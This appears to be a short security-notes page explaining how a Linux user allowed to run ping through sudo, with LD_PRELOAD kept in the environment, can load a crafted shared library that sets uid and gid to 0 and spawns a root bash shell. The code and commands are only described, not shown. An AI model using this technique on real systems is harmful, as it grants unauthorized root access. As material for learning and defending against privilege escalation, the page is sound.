Sudo + LD_PRELOAD (Shared Libraries)
For this attack, we need user with sudo access to run some command (can be any command) + LD_PRELOAD variable to persist with sudo call.
Shared libraries are collections of precompiled code that can be used by multiple programs simultaneously. They provide a way to modularize code, allowing functions and data to be shared across different applications without the need to duplicate the code.
LD_PRELOAD: An environment variable used in Unix-like operating systems to specify a shared library to be loaded before others when a program is run. It can be used to override functions in standard libraries.
Understanding the Context:
If a user has permission to run a program with sudo, but that program calls functions from shared libraries (like libc), you can use LD_PRELOAD to inject your own shared library that modifies the behavior of these functions.
Example User
Attack Scenario
From above example, we can see user dollarboysushil can use ping command as root without root's password.
Also, we can see env_keep+=LD_PRELOADwhich means environment variable are preserver when using sudo.
For the attack,
We are going to craft a malicious shared libraries, then we will include this malicious shared library with the LD_PRELOADvariable.
Then when we run sudo ping, we will be able to load our malicious shared libraries.
Creating malicious shared libraries
in above malicious.c file, we are unsetting our environment variable (LD_PRELOAD), then we are setting our gid and uid to 0 (root) and then we are spawning bash shell
Compiling this malicious.c
Here, we are compiling our malicious.c code into shared library file, malicious.so
Then when we run ping as sudo,
We are now, root
Last updated
Was this helpful?